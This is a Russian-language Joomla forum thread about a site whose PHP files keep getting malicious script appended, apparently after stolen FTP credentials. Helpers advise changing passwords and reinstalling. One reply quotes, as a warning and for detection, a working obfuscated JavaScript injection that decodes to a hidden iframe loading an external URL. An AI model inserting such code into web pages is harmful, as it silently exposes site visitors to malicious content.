Сайт умер благодая вредоносной програме или хакерам...

Тема в разделе "Сайт умер, лежит и не дышит", создана пользователем SergeyDSA, 21.02.2011.

  1. Offline

    SergeyDSA Недавно здесь

    Регистрация:
    29.01.2010
    Сообщения:
    27
    Симпатии:
    1
    Пол:
    Мужской
    С непонятных причин сайт не стал загружаться. Стал выдавать – «не может парсировать в центральном ,так сказать, index.php строку 85. Залез в файл – смотрю, в конце файла кусок скрипта огромный добавлен – у меня был этот файл не подпорченный. Я удалил кусок лишнего кода и всё заработало. Это было месяц назад. Сегодня та же ситуация, но удаление лишнего кода не помогло, так как заразились и некоторые другие файлы. В админку я кое-как зашел, ну а толку с того. Но у моего знакомого тоже сайт глюконул как точно же, как и у меня, но выдало такое – что может вы заходили на сайт besloqawe.ком (ком – пишу на русском, что бы вы туда не ходили). Ну и короче он вас, может заразил. Это может быть вредоносная программа и вполне возможно, что он недавно был взломан хакерами… Это гугл обнаружил такую проблему. Если это действительно вредоносная программа или хакеры – что делать? Снести жумлу, сменить пароли? Это что-то даст?
     
  2.  
  3. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Почитайте на форуме, обсуждалось много раз
     
  4. Offline

    SergeyDSA Недавно здесь

    Регистрация:
    29.01.2010
    Сообщения:
    27
    Симпатии:
    1
    Пол:
    Мужской
    Тем похожих много, но ничего конкретного для меня я не нашел... Если это вредоносная програма, которая скрипты в конци php файлов дописывает, то где эта тварь сидит? - на сервере? Тогда куда хостер смотрит. Если это хакеры - то как от них спастись - сменить жумлу (так как она уже запорчена) и сменить по возможности пароли?
     
    Azamat нравится это.
  5. Offline

    SergeyDSA Недавно здесь

    Регистрация:
    29.01.2010
    Сообщения:
    27
    Симпатии:
    1
    Пол:
    Мужской
    мда... а я то думал, что мне погогут с гадами...
     
  6. Offline

    SergeyDSA Недавно здесь

    Регистрация:
    29.01.2010
    Сообщения:
    27
    Симпатии:
    1
    Пол:
    Мужской
    Коль мне никто не помагает - пришлось в полуживой админ панели написать приветствие, если кто хочет почитать, Заходите, welcome to http://www.kovbasa.net/ .Я выживу...
     
  7. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Вернее всего, на 99% ваши пароли от фтп были унесены вирем (забираются из клиента фтп). Меняйте пароли на фтп, база как правило остается не задетой. Заливайте поверху чистую джумлу и смотрите
     
  8. Offline

    SergeyDSA Недавно здесь

    Регистрация:
    29.01.2010
    Сообщения:
    27
    Симпатии:
    1
    Пол:
    Мужской
    Спасибо Asylum. Не буду вникать в подробности, но похоже, что Вы правы, это фтп. Он настроен у меня через тотал командер, но имя и пароль я в тотале не храню, а каждий раз ввожу руками, так как же оно ворует? И второе - а что делать, вообще отказаться от фтп как такового?
     
  9. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 038
    Симпатии:
    518
    Пол:
    Мужской
    Забей в поиск об ответственности хостера за безопасность сайта.
    Это может быть и трабл защиты хостера,особенно это бесплатные услуги по хостингу.
     
  10. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Без фтп жить не удобно, первое, это поменять пароли. Иначе сайт можно будет заливать до бесконечности
     
  11. Offline

    SergeyDSA Недавно здесь

    Регистрация:
    29.01.2010
    Сообщения:
    27
    Симпатии:
    1
    Пол:
    Мужской
    Да хостинг то платный, сервер в США. Вчера знакомому снесли верд прес и стали жумлу ставить по фтп. До этого по фтп с его сайтом никто не ковырялся!!!! Только поставили - смотрю, те же ошибки, захожу в файл его - тоже кусок левого кода висит - удалил нафиг и сайт заработал. Но не надолго, в некоторых других файлах этот код добавится! Я понял, что бессилен и снесли всё, хорошо, что у него база пустая, терять вроде как нечего. Щас он поменял фтр пароль и ставим заново. А я благодаря тому, что файл базы вчера сохранил, немного помучившись без привычки ВОССТАНОВИЛ САЙТ с Божьей помощю ну и Вашей. Спасибо. Всем.!:)
     
  12. shahin
    Offline

    shahin р-т

    Регистрация:
    22.04.2010
    Сообщения:
    437
    Симпатии:
    37
    Пол:
    Мужской
    есть такой скрипт можно вставить после index.php и заразить сайты на джумла.. но по моему эт проблема решено после версии 1.5.15

    скрипт такой: между <script>и</script> такой код:var source ="=jgsbnf!tsd>#iuuq;00svtsn/dpn0dpvoufs0hp/qiq@tje>2#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result);
    смотрите есть ли у вас на сайте такой код? или похожий на это.
    ВНИМАНИЕ!! НИКОМУ НЕ СОВЕТУЮ СКОПИРОВАТЬ ЭТОТ КОД НА КОМП ИЛИ КУДА ТО МЕЖДУ ТЕГАМИ <script>и</script> ВАШ КОМП МОЖЕТ ЗАРАЗИТСЯ!!
    если увидите такое просто стерите из файла
     
    SergeyDSA нравится это.
  13. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 038
    Симпатии:
    518
    Пол:
    Мужской
    SergeyDSA,
    Пробуй в следующий раз заливать файлы через файловый менеджер хостера.
     

Поделиться этой страницей

Загрузка...